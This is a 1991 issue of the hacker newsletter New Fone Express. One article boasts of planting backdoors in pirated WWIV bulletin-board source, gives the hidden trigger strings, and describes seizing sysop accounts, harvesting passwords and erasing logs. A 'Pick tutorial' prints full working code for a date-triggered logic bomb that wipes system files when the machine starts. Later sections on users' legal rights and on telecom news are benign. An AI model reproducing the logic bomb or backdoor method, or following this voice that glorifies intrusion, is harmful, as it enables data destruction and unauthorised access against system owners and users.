======================================= T H E N E W F O N E E X P R E S S ======================================= The newsletter of the Society for the Freedom of Information (SFI) Electronic Edition Central distribution site is Secret Society BBS (314) 831-9039, WWIVNet 3460, 24hrs ------------------------------------------------------------------------------ The publisher, SFI, distribution site(s), and authors contributing to the NFX are protected by the Bill of Rights in the U.S. Constitution, which specifically protects freedom of speech and freedom of the press. The information provided in this magazine is for informational purposes only, and the publisher, SFI, distribution site(s) and authors are not responsible for any problems resulting from the use of this information. Nor is SFI responsible for consequences resulting from authors' actions. This disclaimer is retroactive to all previous issues of the NFX. We accept article submissions of nearly any sort, about hack/phreak/anarchy/gov't/nets/etc. Send mail to the publisher (The Cavalier) at any of these addresses: WWIVnet [15@3460] WWIVlink [442@13468] VMB (301) 771-1151. hit #, then 140. Ripco [send mail to Silicon Avalanche] Daydream Nation [send mail to Silicon Avalanche] Internet [1098i9@gmuvax2.gmu.edu or 2275a6@gmuvax.gmu.edu] The printed edition of the newsletter is available for $14 (U.S.) per year on paper or $2 (U.S.) for a single copy. Send mail to the New Fone Express, Jackson House Rm 206, President's Park, 10309 Senatorial Lane, Fairfax, VA 22030. Don't forget your name and address. To download the New Fone Express, call Secret Society at (314) 831-9039 and log on as NFX, password NFX, phone# 0000, or see the distribution list elsewhere in this magazine. ------------------------------------------------------------------------------ Highlights for Issue #6/November 1991 ===================================== * "Hacking WWIV v4.12" ... by (anonymous) (see article #1) * A Pick Tutorial Pt. 3 ... by Silicon Avalanche (see article #2) * Six Simple Things to Do.. ... by Polekat (see article #3) * Distribution Site List ... edited (see article #4) * Trendwatcher ... edited (see article #5) * Editorial ... by the Cavalier (see article #6) ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ "Hacking WWIV v4.12" The following is an account of a few special events that occurred in the 314 area code concerning the hacking of WWIV v4.12 bbs's. All of the events described in this article happened between 12/03/90 and 10/04/91. With the onset of a new version of WWIV coming out, my hunger for C programming experience, and my amount of C programming language ever expanding, I dreamed about what I might add to the new source code. Coming up with some good ideas, (yes, actually useful WWIV mods) one very malicious thought crossed my mind. Something a friend of mine had gotten me thinking about earlier that day. Insert a back door into the WWIV source code, and distribute the bogus source. Ahh yes! The ultimate power! Total control of someone else's computer, that didn't know you in the slightest way! Earlier that month, Wayne Bell had just made available, to all registered System Operators of WWIV BBS software, the WWIV v4.12 source code. Since I was still running v4.07 at the time, I decided this was a good time to upgrade. WWIV v4.12, seemed to have a lot of great new features that would have required massive modification to a v4.07 source code. Upon getting my paws on a copy of the v4.12 source code, I sat down for about two and a half hours and modded away. After I finished inserting a batch upload mod, 3 things forced me to stop modding for the time being. 1) Fellow users would kill me if I called them at 2:30 AM to test a mod. 2) I wasn't sure if any of my users knew how to use Zmodem batch upload. 3) I was really hungry for about six White Castle hamburgers. The part about the hamburgers, being the most dominant thought in my mind, pushed me to jump in the car, head down to Dorsett Rd., and grab some burgers. While sitting in the car, eating my hamburgers, I deliberated over how I might be able to use WWIV to gain control of other unsuspecting sysops' computers. At that moment, there in the parking lot of White Castle, at exactly 2:51 AM on 12/03/90, the ultimate hack plan hit me. I like many other unregistered WWIV sysops had obtained the WWIV v4.12 source code, illegally. Yes, a user had uploaded it to my computer. I had been considering registration, since I wanted to get my BBS on WWIVnet, and this was a requirement if your WWIV BBS was modded in the SLIGHTEST way. But I thought, if it was so easy for me to get a copy of the source, just think of how many other unregistered sysops are running pirate sources that they modded too! The only thing that stood in my way of modifying and distributing a pirate source code was PKZIP v1.10 authentic verification. When you unzip an original unmodified v4.12 source, a -AV will appear next to every file, and at the end, the message: 'Authenticity Verifies! Wayne Bell (UJK765).' Well, if I modified any of the source files, and put them back in the zip, the message would be more along the lines of: 'Authenticity Verification Failed! Contact the author' or some BS like that. Deciding that I wouldn't worry about this problem for now, I began to write my back door into the v4.12 source. Any dummy with an ounce of knowledge of C could have done it, I was surprised that I hadn't ever heard of it being done before. Nonetheless, I started out where all the // sysop utility commands are written in to the main source file. The idea that hit me was to create a secret WWIV dos shell command that didn't ask for a system pw. The command, like most 'special' commands in WWIV would begin with a // preceding it, and would work when entered at the main menu. It would have to be a code, that didn't even remotely look like anything to a normal user. The code would need to look like an intricate line of C programming. These two characteristics were required because, first, and most important, I didn't want the code to be anything 'guessable.' Secondly, it had to be 'hidden' from someone who might be paging through the programming code. Strolling through the WWIV C code, I found a nice, unguessable, line that would perfectly suit my needs. The line read as follows: //0_RDWR | 0_BINARY | 0_CREAT, S_IREAD Upon deciding that this would be my secret shell to dos code, I scrolled up to the //DOS function, to find out what made it work, and what asked for the system password (SY:) before the shell occurred. After block copying the programming code that came after //DOS, (the dos shell activation programming code) and strategically placing it after my //0_RDWR | 0_BINARY | 0_CREAT, S_IREAD code so it would be activated when the // code was entered, I was ready to compile it and test it out on my own system. After a few error corrections, time wasting errors like leaving off a '{' or something stupid like that, I achieved a BBS.EXE that to everyone, except myself would look perfectly ok to run a WWIV BBS on. I replaced my normal BBS.EXE with this new one, and activated BBS.COM(to load everything up). After using space+f to fast log on to my account, at the main prompt, I entered the // code. I was immediately elated with happiness to see that I had been abruptly thrown into a DOS shell. I didn't even get asked for a system password. It was great! Since I was in such a good mood, I decided to add one more // code into the BBS. This next code would activate the user editor. Once I had begun using my back door, on other BBS's, I realized that the User Editor back door wasn't worth crap, since you have to have a 255 SL to be able to read passwords, and you can't give out anymore access than you have. But, at the time that I programmed in the User Editor back door, I wasn't thinking about this. The next line details the code that activated the user editor. Again, it was a far strung out code that no one would guess, looked like a line of C, and was entered from the main menu prompt. //SPRINTF(S1,%SUSER.IEND++261 Upon entry of this code, there is an instruction in the source to activate a function called data(). Data() was a copy of void uedit() that I had renamed, void data(), and stuck into the VOTEEDIT.C file. After entering this code in, I was able to page through all of the user accounts, and see whatever info I wanted to see, except passwords! I didn't realize the check for a 255 SL upon password display until the source was distributed, so for the most part, the user editor back door was useless. Even if the uedit backdoor didn't do anything except display personal info, I still had the most powerful weapon programmed into the code, the DOS back door. When I was finished with the bogus source, and felt that it was ready to be distributed, I zipped it down, and placed it on my BBS for download. About four months went by, and I forgot about the whole thing. As a sysop, I didn't call out a whole lot, so I didn't know what BBS's might have the source, furthermore, since I had forgotten about it, I didn't care. One day, my friend who originally came up with the wonderful idea, called me with a supreme amount of excitement in his voice. When I had programmed in the back doors, I had given him a copy of the codes, and what they would do. At that time, he seemed rather passive about it, and so was I. For some reason, both of us didn't think anything would ever come of it. Anyway, he had called to tell me that he had logged on to a modified, unregistered WWIV v4.12 BBS, and he had typed in the back door code for the user editor, and much to his amazement, it worked! I'm sure many of you reading this, were familiar, or at least heard of something called NGNet. It stands for Neat Guys Net (if that tells you anything). Well, NGNet only expanded out to about six or seven BBS's, at the height of its popularity, but one odd thing about all these BBS's, is that they all looked EXACTLY alike, and I mean EXACTLY. All of them had the SAME modified pirated WWIV v4.12 source code. It was a hacker's dream come true. To have total control of a whole slew of BBS's, on their own network. It turns out, that the originator of NGNet, whose name I do not know, somehow got a copy of the source code that I had modified. He then, not knowing that there was a back door in the source, modified it to his liking. After this, he gave a copy of the modified BBS.EXE to the other BBS's that were in NGNet. Almost all of the BBS's in NGNet, being run by bullshit sysops that didn't know crap about source modification, immediately switched to this new BBS.EXE with the mods that the originator of NGNet had installed, and which back door mod was in too. The first BBS that I used the DOS door on, was The Mysterious Land of A&F. It worked flawlessly, and with my extra knowledge of WWIV password storage, I knew right where all the info I needed was. Since I was in DOS, I made my way to the \WWIV directory. By typing the CONFIG.DAT file, I was granted, along with a lot of garbage characters, the system password. After activating my printscreen key to send that password to the printer, I wasted no time in making my way into the \WWIV\DATA directory. Here I typed the USER.LST file. Among all the garbage that filled my screen, a few key numbers and one word caught my attention. The numbers were the last four digits of the sysop's phone number, and the key word was the sysop's password! Now, armed with the system password, the sysop's personal password, and the last four digits of the sysop's phone number, nothing could stop me from taking complete control of the BBS! After issuing exit, and a carriage return, I was soon back in WWIV. I quickly logged off, and began to dial that very very Mysterious Land of A&F again. This time, instead of logging on as a normal account, I put in all the sysop's info, and soon I was on the BBS via the sysop's account. I was curious as to what Mysterious secrets the Land of A&F held, so I began to look around. A quick trip into the transfer area revealed some shocking news about the sysop, and the type of BBS he ran. Dropping back to the main menu, I requested a list of the message bases via the '*' command. The first message base that caught my eye, and for the moment, piqued my interest, was the NGNet Sysops' Discussion Net. Scanning through the messages, I noticed, what I had assumed about the NGNet BBS's. Most of the sysops were, or acted like they were no older than 15 years old. So many of the messages on this sub were so worthless, things like "Hey guys....how do you like my new macro" and "Do any of you other NGN bbs's out there have any new porno GIFS you could upload to my board?" This kind of crap is the pointless childish bullshit that I try to avoid when I call out, let alone when I go seriously hacking. Anyway, after reading these discouraging messages, I became extremely uninterested in the message bases. I then, shelled down to dos, this time using the legit //DOS command, and the system password. After looking around for a while, and finding some more incriminating evidence about the sysop, I got kind of bored. Since I felt that it would be nice to keep this BBS under my thumb, I needed to edit the daily sysop log files, so the sysop wouldn't realize someone had been there, under his account. After some copying, downloading, uploading, and overwriting of files, the edited sysop log files were in place, and I felt at ease about the whole thing. My terminal program displayed that I had been on the BBS for 38 minutes. I was tiring fast, as in order for the sysop not to see me, I had to do this at 3:15 AM, so I logged off and went to bed. As time went on, my friend and I noticed, and hacked into all the BBS's that were on the NGNet. We even did a few that weren't on the net, and had just picked up a copy of the bogus source floating around. All in all, it was an incredible feat to be accomplished, but, with the help of some extremely stupid sysops who failed to look for Authentic Verification when they unzipped their pirate source codes, it was very possible. I suppose there is some kind of morale to this story, that being that you should probably register WWIV if you want to mod the source, but I won't go too far into that. A Few Side Notes Of all the time I spent hacking at the NGNet bbs's, I think I spent the most time on Land of A&F. That bbs, and Quality Connection, interested me most. Of course, with all this hacking, it had to happen. I screwed up a few times. Never did I mess up so bad, that the sysop totally found out about what was going on, but I did make a few mistakes. One time, when I was on Land of A&F, I forgot to edit the sysop's name (I had logged on under his account) out of the 'last few callers' file. Amazingly, Awesome A, the sysop of A&F, didn't catch it. Another time, I had copied all of Mr. Quality's (sysop of Quality Connection) bbs passwords off his hdd via the back door in Quality Connection. Mr. Quality had sysop access at Land of A&F, so of course, I had to check things out from his account, even though I knew it all would be the same. I was getting kind of lazy, and one time I didn't really feel like doing all of the log file editing, so I just logged off. A few days later, I intercepted a message on the NGNet Sysop Discussion Sub (while on under the sysop's account) that Awesome A had posted. It alerted all the NGN bbs's of a hacker that logged on to Land of A&F under Mr. Quality's account. Of course, none of those dumbshit NGNet sysops even thought there might be something wrong with their source code, or EXE file. With Mr. Quality's other passwords, I gained total control over a few bbs's that didn't even have the back door in them, but where Mr. Quality had sysop access on. I did this with Awesome A's passwords too, and at one time had total control of Too $hort's bbs, the Ghetto. Too $hort wasn't running the pirate source code, but for some reason he had given Awesome A sysop access. From here, I copied out all of Too $hort's passwords, and used his accounts around town. It was nice to have full run over so many bbs's. Too $hort had pretty good access (90 SL) at Master Control Program, which allowed me to batch d/l from there quite often, but I never was able to get an account, on MCP, that had anything better than a 90. I never did really get to know Too $hort beyond a dialout to his bbs, but I'll tell you one thing, I really hate the way he signs his name, Too $hort, the dollarsign, in my opinion, is really squidly. Another good bbs, that I called quite a bit, usually under false accounts, was Secret Society. Grim stocks an excellent selection of informational text files, but he needs to upgrade to at least 2400 sometime in the near future, if he expects to keep that excellent group of users calling. I know that many of you who read this will doubt any of what I have said ever happened, and you'd be an idiot not to unless some evidence was presented. Yes, that's correct, the evidence IS out there. I can guarantee anyone that the modified WWIV v4.12 source is out there, somewhere still on- line ready to be downloaded off of some weak, non current pirate bbs. If you happen to see a copy of the WWIV v4.12 source, on a bbs, do an archive listing, and, if possible, an integrity check. If it doesn't have any pkzip verification on it, then extract out the BBS.C and VOTEEDIT.C files and download them. Load BBS.C into an editor, and do a 'string search.' Search for either one of the above // codes. Both, the dos door, and the uedit door should be in there. Also, in VOTEEDIT.C, as I mentioned before, there is a function in there called data(). In it is the exact same thing that was in the function uedit(). Also, another way of proof, is that you could possibly find and call an unregistered, modified WWIV v4.12 bbs and attempt to use those codes. But since v4.20 is out, I doubt many of the idiotic squid sysops that grasped on to the unverified v4.12 source will still be with v4.12, they will probably have upgraded to v4.20 now, being that their bbs's are so damn unstable. I never did register my copy of WWIV, as my bbs went down a short time ago, and I never was able to get on WWIVnet. It was on-line for over four years, very private, but lately, I've realized the lousy condition of the hack/phreak/anarchy community, and I've just kind of lost interest in bbs'ing. I'm writing this, partly, to try and 'do my part' for the hack/phreak/anarchy community, and show the others out there that yes, there are still a few conniving, ingenious, ruthless hackers out there. I'd like to see the other true hackers out there get off their asses and do something! If you're not going to hack anymore, at least write an article about your experiences, and send it to the editor of Phrack, NFX, Digital Underground (If DU is till in publication) or any electronic publication. Don't go around destroying systems (rm *), just hack them, and brag about it, just like the old days. Note that I never once deleted a file on any of the computers that I hacked, that I wasn't absolutely sure I would replace. -Disclaimer of Who I Am- I don't really bbs too much any more, as I haven't been interested in it for quite sometime now. Still, just to avoid any accusations, phone harassment, or any bullshit from those NGNet sysops, whom I'm sure will be extremely pissed once they hear of this, I'll be placing strict anonymity on this article. Don't come after the editor of New Fone Express, as even he won't know who I am. I'm not even sure that he'll put this in his publication. And above all, please don't be an ass and throw accusations around at other bbs'ers. I'm only slightly active on one bbs now, and if I don't call there within four days from now, I'll be deleted due to inactivity. As I mentioned before, I don't have an account on MCP any more, again, due to inactivity. I had a stable account on Secret Society, but for quite sometime, I've been deleted, yes again, due to inactivity. I tried to keep a stable account on Angel Station, but it seemed that bbs was always crashing, and everyone would have to logon as new users. I'm pretty sure I've been deleted on Blitzkrieg, but I have to say that that was one of the best, most stable bbs's I was ever on. So, if you are ready to go on some hellish trek to even attempt to find me, give up now! Don't waste your time, as I'm sure your attempt(s) will be in vain. >< [TC: The best chance you have of reaching the author is to send mail to me, and I will forward it to the false account that has been set up. Also, the author included around 30k of screen capture files from the hack itself, which I have omitted in the interests of space.] ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ Pick Tutorial A Pick Tutorial - Courtesy of Silicon Avalanche of SFI Installment #3 COUGH.. HACK... WHEEZE... Hello everybody, and welcome to the latest edition of the Pick Tutorial. This volume is a quickie (because I'm about a week past the submission deadline, and the publisher is starting to hound me), about a simple, generic Pick virus. Let's get started, 'eh? >ED SYSPROG-PL USER-COLDSTART TOP . 001 PQ . I 001+HVIR 001+P 001+ . FI >ED BP VIR NEW ITEM TOP . I 001+* 002+* 003+* 004+* 005+* 006+BREAK OFF 007+WAKEUPDATE="MM/DD/YY" 008+* In the above, replace the MM/DD/YY with a month, day and year. 009+WAKEDATEIC=ICONV(WAKEUPDATE,"DI") 010+* 011+IF DATE()#WAKEDATEIC THEN STOP 012+* Tell everybody we're here... 013+EXECUTE "BLOCK-PRINT TIME'S UP!!!! HEH HEH HEH HEH HEH HEH HEH HEH HEH..." 014+* Wipe out the SYSTEM file - lose all the accounts... 015+EXECUTE "CLEAR-FILE DICT SYSTEM" CAPTURING JUNK RETURNING MOREJUNK 016+EXECUTE "CLEAR-FILE DATA SYSTEM" CAPTURING JUNK RETURNING MOREJUNK 017+* Wipe out the MASTER DICTIONARY (MD) 018+EXECUTE "CLEAR-FILE DICT MD" CAPTURING JUNK RETURNING MOREJUNK 019+EXECUTE "CLEAR-FILE DATA MD" CAPTURING JUNK RETURNING MOREJUNK 020+* Wipe out the ERRMSG file 021+EXECUTE "CLEAR-FILE DICT ERRMSG" CAPTURING JUNK RETURNING MOREJUNK 022+EXECUTE "CLEAR-FILE DATA ERRMSG" CAPTURING JUNK RETURNING MOREJUNK 023+* Create a new LOGON banner to tell everyone hello... 024+REC='' 025+REC<1>="L(12)" 026+REC<2>="S(25)" 027+REC<3>="HYour System's been SHUT DOWN!!" 028+* Add as many lines saying whatever you want, but the last line MUST be: 029+REC<4>=+ 030+* in this case, 4 is the last line, this would be a 50 if REC<1> through 031+* REC<49> were defined, etc... 032+WRITE REC ON SYSTEM,"LOGON" 033+* DO NOT KEY IN LINES 23 TO 31 IF YOU KEYED IN LINES 17 TO 19!! 034+* Log off to show off our "handiwork"... 035+CHAIN "OFF" 036+END 037+ . FI >BASIC BP VIR and the screen will give you something like: **** >CATALOG BP VIR Now when the system is powered on and does its coldstart on the day you defined in line 7, the program above (VIR) will be executed. (Heh.. and so will the system...) -------------------------------------------------------------------------------- The next installment will have a line-by-line breakdown of the above program, some insight into the new AP (Advanced Pick) and how it differs from R83 (Generic Pick), and any other "dirt" that I feel is worth mentioning. -------------------------------------------------------------------------------- A note: as far as most people know, I am the only author of a series on the Pick Operating System. This is not true. The authors of P/HUN published an article on it WAY back in time, an article that we at SFI don't have in our extensive Text library. I have been programming the Pick O/S for around 11 years, or since I was 6 or 7, whichever is longer, so I should have SOME insight as to how things work. I'm thinking of starting a "PICK Q&A" if there are enough people that have questions (send questions to the address below). I am also attempting to compile a list of Pick dialups, any assistance would be appreciated (send dialups to the address below). ------------------------------------------------------------------------------- All Pick-Related correspondence should go to the address below: PICK c/o New Fone Express 15405 Michigan Road Box 734 Woodbridge, VA 22191 ----------------------------------------------------------------------------- >< [TC: Silicon Avalanche may be reached at SILICON AVALANCHE@3460 or at the Internet, Ripco, or Daydream Nation addresses in the header.] ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ Six Simple Things You Can Do To Save Your Rights Everyone knows that modem users are under an assault of new dimensions as evidenced by Operation Sundevil and related governmental activities. Moreover, there seems to be a significant movement by the media to label generally harmless behavior as "terrorist" activity or part of an evil scheme by computer users to somehow cause the collapse of our society. Computer users are seeing their first amendment, privacy and property rights stripped away and mangled right before their eyes with increasing frequency. Of course, there are certain individuals who break the law with computers, just as there are individuals who use the telephone or postal system to break the law. However, the vast majority of modem hobbyists are engaged in perfectly legitimate use of their equipment and are burdened with being grouped with the few "rotten apples" that may exist. Every person who uses a modem as a hobby should be concerned with acting to preserve the rights that all citizens are privileged with. There are some simple things that everyone can do to make sure that no unnecessary intrusions on civil liberties take place as a "knee-jerk" reaction to the bad press given to the BBS and computer community. (1) BE INFORMED. Clearly the most important thing a modem enthusiast can do is to stay abreast of the happenings which are shaping the hobby. There are many ways to do this. Make it a habit to read the electronic "zines" which chronicle the computer underground and related topics. A good starting point would be publications like "The Computer Underground Digest" and "EFFector" the electronic publication of the Electronic Frontier Foundation. Both of these are available on a large scale via Internet or from hundreds of private BBS's all over the country. The nets and BBS discussion boards are also good sources of information, but care should be given to be discerning while reading posts. Often times, the truth is distorted by participants who are not fully informed or are simply speculating. The mainstream media is also a source for some information, but care should be given here too, as the media certainly does not have a clear picture of the magnitude of the hobby, or a real grip on what it is all about. (2) INFORM OTHERS Make it a point to educate people who do not know of the important events which are affecting all modem users. There are hundreds of users in Cyberspace who are oblivious to the move to strip their rights, and may remain so until it is too late. Bring up the topic on BBS's or SIGs where it may be relevant. Distribute zines and text files which detail important events. Do everything you can to spread the word. If you are a sysop, keep informative text files easily accessible to your users. Also, be sure to clarify misunderstandings and misapprehensions whenever it is appropriate. If someone on the Net is spewing ridiculous lies or rumors, do all that you can to straighten them out. Non-hobbyists should also be informed. Do you know someone who writes for a newspaper or a magazine? Professors or teachers? Anyone who may be at all interested might be enlightened by a copy of an article or by an intelligent discussion of these issues and could provide invaluable assistance in the struggle to preserve civil liberties. (3) BECOME ACTIVE There are many ways that an individual can make a difference through his own action. One of the simplest is to join an organization which is doing things to preserve your rights. The EFF (Electronic Frontier Foundation), the ACLU (American Civil Liberties Union), and CPSR (Computer Professionals for Social Responsibility) are all devoted to issues which should be a concern to modem users. Perhaps the most powerful action one can take is to get out and vote. This takes a little research into the candidates and their platforms, but if the right people do the research and spread the word to others, the results can be powerful. Another politically oriented step to take is letter writing. Write your legislators about the issues that concern you. Sometimes, the net will facilitate this for you, and let you do it electronically. However you do it, direct feedback from constituents can go a long way toward shaping a congressperson's view on an issue. (4) MODEM RESPONSIBLY This is not an article on what is legal and what is not, nor is it the right place to preach about the pros and cons of hacking, phreaking or pirating. But, each one of us can go a long way if we consider sticking to some basic rules. Don't do unnecessary damage to a system you may be exploring. Don't harm others without cause. Don't threaten to do these things as a way of showing your techno-prowess. Ego can go a long way toward hurting the cause, and bragging to the wrong person can bring the heat down on everyone, innocent or guilty. (5) KNOW YOUR LEGAL RIGHTS Although this is obviously similar to the first point on being informed, it is important enough to mention independently. Make sure you know the laws you are dealing with. Go to a library, ask questions via the net, and do whatever it takes to understand the legal restrictions that apply on certain types of behavior. If you are a Texas resident, for example, have you read the Penal Code's section on computer crime? Although it is available in text file format (I have a copy on my BBS), people are more concerned with the latest Phreaking file or Hacking tract. Take the time to know the law, and you may be saving yourself a lot of hassle down the road. (6) IN CASE OF TROUBLE, GET GOOD COUNSEL If you ever find yourself in a situation where you computer activities have lead to trouble with the authorities, do not do anything until you have consulted an attorney. Believe it or not, there are attorneys who understand these issues and who are sympathetic to the way the laws are often vague and slanted against the modem user. If you can't find one, contact one of the organizations mentioned earlier. Whatever you do, don't act without sound legal advice. This is the biggest way to get yourself in deeper trouble. There are also certain things to say and not to say that you will not know, and couldn't guess without talking to a lawyer. ------------------------- The coming years will see the hobby change in many ways. There are plenty of people who are interested in seeing it move away from the way it is, and they are generally the ones with the power and influence to make sure it can get done. It will take a concerted effort from the computer community to keep things from getting out of hand. This list is just a beginning. Make sure that you keep these things in mind, when you are practicing your arts in Cyberspace. It may not make any difference in the long run, but if there is even a chance that it can help, it's worth the effort. >< PoleKat [TC: The author can be reached on his board at 1@5285, or on the Internet as polekat@pro-smof.cts.com.] ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ Distribution Sites As of 10/91, the distribution sites with the New Fone Express include: * Secret Society Blitzkrieg (314) 831-9039 (502) 499-8933 3/1200 bps 3/12/24/9600? WWIVNet 3460 WWIVnet 5211 Central Distribution Site TAP Headquarters Solsbury Hill * The Bamboo Gardens North (301) 428-3268 (512) 385-2941 3/12/24/9600HST 3/12/2400 bps Usenet feed WWIVNet 5285 1500+ text files Cyberpunk & Computer Law BBS A * indicates a system with a 'captive account,' or an account specifically for downloading the NFX. Hello to Bamboo Gardens North, Polekat's board!... Many thanks to the sysops supporting the NFX. >< ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ Trendwatcher AT&T is developing a RISC-based PBX called Definity Generic Three to be released in 1992. It is based on a modified version of Motorola's 88000 chip, and will offer an upgrade path for Definity Generic One users. In June 1991, Mitsubishi filed a $430,000 suit against AT&T claiming that AT&T did not warn Mitsubishi of fraud risks in AT&T's PBX switches. When fraud occurred, Mitsubishi claims also that AT&T did not respond quickly enough to locate the source of the fraud. The Supreme Court has overruled the emergency protest filed by the Newspaper Association (or whatever) to attempt to keep the Baby Bells from providing information services to their consumers. Thinking Machines Inc. has reportedly created a massively parallel computer that can achieve computational speeds of up to 1 teraflop. (1,000,000,000,000 floating-point operations per second) SS7 update: As of late July, 1991, Ameritech has SS7 software installed and running in 160 of its switches, covering 16% of Ameritech's access lines. Bell Atlantic anticipates having 92% of its access lines on SS7 by the end of 1992, and 99% by 1994. BellSouth expects to have 76% of its access lines SS7-capable by the end of 1991, and 94% by the end of 1994. Bellcore's joint-industry SS7 task force is up to speed. Apparently, the catastrophic switch failures earlier this year were caused by DSC's revised algorithm, which inadvertently dropped 3 bits. Mitch Kapor has joined the board of directors of the Commercial Internet Exchange Associations, which is "actively working to broaden the base of national and international cooperation and coordination among existing and emerging networking service providers. The organization provides a neutral forum for decision making as the global Internet migrates towards commercialization." >< ------------------------------------------------------------------------------ ------------------------------------------------------------------------------ Editorial "On the road, again." Your faithful publisher is on the move once again, and would like to thank Polekat, 'anonymous,' and Silicon Lightning for their submissions, quite definitely. I don't have all that much to say, or I have too much to say here (one of the two...heh).. A few things I do want to say here: first, a hearty hello to Predator 1@5211 of TAP magazine, still going strong last I checked. Other magazines that have contacted me are Con-Phusion, Phrack (new), and World View -- in one of these upcoming issues, I hope to have information on how to receive them. And these are only the people around who have contacted me - there are MANY more mags out there. Well, in any case, I apologize for my complete lack of coherent thought here, but I've got quite a migraine from all the goddamned noise here. 'We return you to your profound editorials next issue!' Hope you all had a happy Halloween, though. Hey! That's what we need! A trick-or-treat daemon! heheheh... I'll leave that one up to creativity. Until next time. ><